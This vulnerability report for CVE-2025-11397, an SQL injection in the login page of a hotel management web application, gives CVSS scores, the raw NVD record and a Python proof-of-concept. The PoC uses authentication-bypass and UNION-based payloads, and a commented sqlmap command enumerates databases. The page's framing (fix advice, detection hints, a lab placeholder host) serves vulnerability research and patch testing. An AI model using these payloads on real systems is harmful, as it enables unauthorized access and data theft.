Security Vulnerability Report
CVE-2025-11397 CVSS 7.3 HIGH

CVE-2025-11397

Published: 2025-10-07 14:15:36
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in SourceCodester Hotel and Lodge Management System 1.0. The affected element is an unknown function of the file /login.php. Manipulating the argument email results in SQL injection. The attack may be initiated remotely. An exploit has been released to the public and may be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
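CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Note: 7.3 HIGH is the CVSS 3.1 score from the record's Secondary source. The raw JSON below also carries a Primary CVSS 3.1 assessment of 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and a Secondary CVSS 4.0 score of 5.5 MEDIUM, so check which score your triage process uses before prioritising.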

Configurations (Affected Products)

cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Hotel and Lodge Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
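# CVE-2025-11397 - SourceCodester Hotel and Lodge Management System SQL Injection PoC
# Vulnerability Location: /login.php
# Vulnerable Parameter: email
#
# Reviewer notes (defensive context):
# - The advisory classifies this as CWE-89. The server-side code is not shown
#   on this page; presumably login.php builds its SQL statement by string
#   concatenation with the email field (confirm against the source). The fix
#   for that class is prepared statements with bound parameters, with the
#   password verified in application code rather than inside the query.
# - For detection, look for POST requests to /login.php whose email field
#   contains quote characters, SQL comment markers ("--") or UNION SELECT.
# - Use this script only to confirm the fix on an instance you operate.

import requests

# Target configuration
# The page's original value pointed at a real registered domain. A hostname on
# the reserved ".test" TLD is used instead, so running the script unmodified
# cannot send injection payloads to a third party. Point it at your own
# isolated lab instance before use.
TARGET_URL = "http://lab-target.test/login.php"

# SQL Injection Payload - Authentication Bypass
payload_email = "' OR '1'='1' -- "
payload_password = "anything"

# Data extraction payload using UNION-based injection
# NOTE(review): the column count of 6 is taken from the page as-is and is not
# verified against the application's actual query.
union_payload = "' UNION SELECT 1,2,3,4,5,6 -- "


def exploit_auth_bypass(target_url, email, password):
    """Check whether the login form accepts an injected ``email`` value.

    Posts ``email`` and ``password`` as form fields to ``target_url`` and
    inspects the response body.

    Args:
        target_url: URL of the login endpoint of the lab instance under test.
        email: Value sent in the ``email`` form field.
        password: Value sent in the ``password`` form field.

    Returns:
        True if the lower-cased response body contains "dashboard" or
        "admin"; False otherwise, including when the request fails.
    """
    data = {
        "email": email,
        "password": password,
    }

    try:
        response = requests.post(target_url, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

    # NOTE(review): this substring match is only a weak signal. A page that
    # merely mentions "admin" is reported as bypassed, so do not treat a
    # True/False result as proof that a patch works or fails. Verify the
    # session state on the server as well.
    body = response.text.lower()
    if "dashboard" in body or "admin" in body:
        print("[+] Authentication bypassed successfully!")
        print(f"[+] Response length: {len(response.text)}")
        return True

    print("[-] Authentication bypass failed.")
    return False


def exploit_data_extraction(target_url, payload):
    """Send ``payload`` in the ``email`` field and show the start of the reply.

    The ``password`` field is fixed to "test". The first 500 characters of
    the response body are printed for manual inspection; this function does
    not itself decide whether the injection succeeded.

    Args:
        target_url: URL of the login endpoint of the lab instance under test.
        payload: Value sent in the ``email`` form field.

    Returns:
        The full response body as text, or None if the request fails.
    """
    data = {
        "email": payload,
        "password": "test",
    }

    try:
        response = requests.post(target_url, data=data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

    print(f"[+] Response: {response.text[:500]}")
    return response.text


# Using sqlmap command line for automated exploitation:
# (the --data value below is reproduced as it appears on the page, where the
# site's e-mail obfuscation has garbled the original form data)
# sqlmap -u "http://lab-target.test/login.php" --data="[email protected]&password=test" -p email --dbs

if __name__ == "__main__":
    print("[*] CVE-2025-11397 PoC - SQL Injection in Hotel and Lodge Management System")
    print(f"[*] Target: {TARGET_URL}")

    # Attempt authentication bypass
    exploit_auth_bypass(TARGET_URL, payload_email, payload_password)

    # Attempt data extraction
    exploit_data_extraction(TARGET_URL, union_payload)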

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11397", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:36.140", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Hotel and Lodge Management System 1.0. The affected element is an unknown function of the file /login.php. Performing manipulation of the argument email results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", 
"Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:nikhil-bhalerao:hotel_and_lodge_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "01868A61-18A4-4C5D-B260-54D49603028E"}]}]}], "references": [{"url": "https://github.com/TThuyyy/cve1/issues/5", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327334", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327334", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.665024", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/TThuyyy/cve1/issues/5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}